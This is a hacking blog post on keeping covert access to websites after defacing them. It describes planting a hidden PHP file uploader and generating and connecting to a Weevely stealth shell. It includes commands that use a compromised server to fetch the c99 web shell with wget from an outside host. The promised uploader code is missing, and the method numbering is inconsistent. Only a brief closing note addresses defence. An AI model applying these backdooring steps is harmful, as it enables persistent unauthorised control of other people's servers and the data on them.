Backdooring Of WebShell :

Backdooring is an art in which every Hacker should be an artist .. So when a hacker hack a site . He defaces and then the so called admin of that website pop up and recover the site . He will absolutely Delete Your Shell so after sometime if an hacker want to connect back ! So their is no chance to get back into the server . So Today I am going to Show You Top 2 Shell Backdooring Techniques For every hacker should know . You Might Know these Techniques but you should continue Reading this article .So the first Method is Hidden File Uploader ! The Second One Is make a stealth Shell With Weevely So let us move on to the First Method Which Is 

  • Backdooring With Hidden Uploaders :

 
So backdoored  uploader is like a hidden uploader u can backdoor any php file like index.php , config.php etc etc so
copy below encoded code and copy that into the source code of that File ! 

As php is a Server side language so our code will never revealed until someone edit it , for accessing just add ?thx after your backdoored file like Hashwares.com/test.php?thx I will show a hidden uploader you can upload any kind of file with any extension like jpg,jpeg,php,asp,gif and all of that but it will be awesome if you password protect it , its your duty to password protect your Hidden Uploader , and if you stuck in a problem feel free to ask me ! Let Us Move On To the 3rd Method which is 

  •  Using Weevely Tiny Stealth Shell:

So what Is Weevely ? Well Weevely Is a program that makes Tiny Stealth Shell . As Stealth Mean its Fully Undetectable. No One can access it except you ! How it works ? For this you should have Kali Linux or You Can Install Weevely On Your PC (I will share how to install Weevely On windows until then use Kali Linux Or Google it ) next step is that generating a shell in Kali's Command Prompt or Terminal Type Weevely Then type "Generate your-pass" (without quotes) , it will make a php File Named Generate .php Open it With Vim Or notepad and copy that Encoded Code and paste it in any file which you wanna Backdoor , when you have done that Get back your kali Terminal or Windows' Weevely and type " Weevely http://ehowtutorials.net/index.php your-pass " (without quote) so after that you will be able to run any command their like "wget http://sh3ll.org/c99.txt shell.php " (without quote) so it will get shell.php in the same directory as index.php has this is the full method . To use Weevely on windows command will be changed like Weevely.py http://hashwares.com/index.php your-pass but first you should install python on your windows, then install Weevely 

Securing Your Server :

Q. So the Question for Web-Developers is How To Secure You Websites or Servers From Backdoors?  
Answer.  When your website got hacked just wipe all the data and restore the backup (if you already created) , if you didn't backup so please read and check each and every file of your Server .

Having Any Problem ? email us Or Contact us On Facebook !!

Post a Comment Blogger

 
Top